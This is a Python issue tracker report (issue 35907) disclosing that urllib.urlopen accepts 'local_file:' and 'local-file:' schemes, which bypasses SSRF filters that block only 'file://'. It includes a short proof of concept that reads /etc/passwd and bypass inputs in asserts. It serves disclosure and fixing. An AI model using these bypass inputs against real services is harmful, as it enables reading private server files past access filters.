This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author push0ebp
Recipients push0ebp
Date 2019-02-06.08:19:50
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1549441191.29.0.148559977828.issue35907@roundup.psfhosted.org>
In-reply-to
Content
The Unnecessary scheme exists in urlopen() urllib

when people would protect to read file system in HTTP request of urlopen(), they often filter like this against SSRF.

# Vulnerability PoC
import urllib
print urllib.urlopen('local_file:///etc/passwd').read()[:30]
the result is
##
# User Database
# 
# Note t


but if we use a scheme like this, parsing URL cannot parse scheme with urlparse()
this is the parsed result.
ParseResult(scheme='', netloc='', path='local_file:/etc/passwd', params='', query='', fragment='')


def request(url):
    from urllib import urlopen
    from urlparse import urlparse

    result = urlparse(url)
    scheme = result.scheme
    if not scheme:
        return False #raise Exception("Required scheme")
    if scheme == 'file':
        return False #raise Exception("Don't open file")
    res = urlopen(url)
    content = res.read()
    print url, content[:30]
    return True

assert request('file:///etc/passwd') == False
assert request(' file:///etc/passwd') == False
assert request('File:///etc/passwd') == False
assert request('http://www.google.com') != False

if they filter only file://, this mitigation can be bypassed against SSRF. 
with this way.

assert request('local-file:/etc/passwd') == True
ParseResult(scheme='local-file', netloc='', path='/etc/passwd', params='', query='', fragment='') 
parseing URL also can be passed.


# Attack scenario 
this is the unnecessary URL scheme("local_file").
even if it has filtering, An Attacker can read arbitrary files as bypassing with it.

# Root Cause

URLopener::open in urllib.py 
from 203 lin

name = 'open_' + urltype
self.type = urltype
name = name.replace('-', '_') #it can also allows local-file
if not hasattr(self, name): #passed here hasattr(URLopener, 'open_local_file')
    if proxy:
        return self.open_unknown_proxy(proxy, fullurl, data)
    else:
        return self.open_unknown(fullurl, data)
try:
    if data is None:
        return getattr(self, name)(url)
    else:
        return getattr(self, name)(url, data) #return URLopener::open_local_file

it may be just trick because people usually use whitelist (allow only http or https. 
Even if but anyone may use blacklist like filtering file://, they will be affected with triggering SSRF
History
Date User Action Args
2019-02-06 08:19:55push0ebpsetrecipients: + push0ebp
2019-02-06 08:19:51push0ebpsetmessageid: <1549441191.29.0.148559977828.issue35907@roundup.psfhosted.org>
2019-02-06 08:19:51push0ebplinkissue35907 messages
2019-02-06 08:19:50push0ebpcreate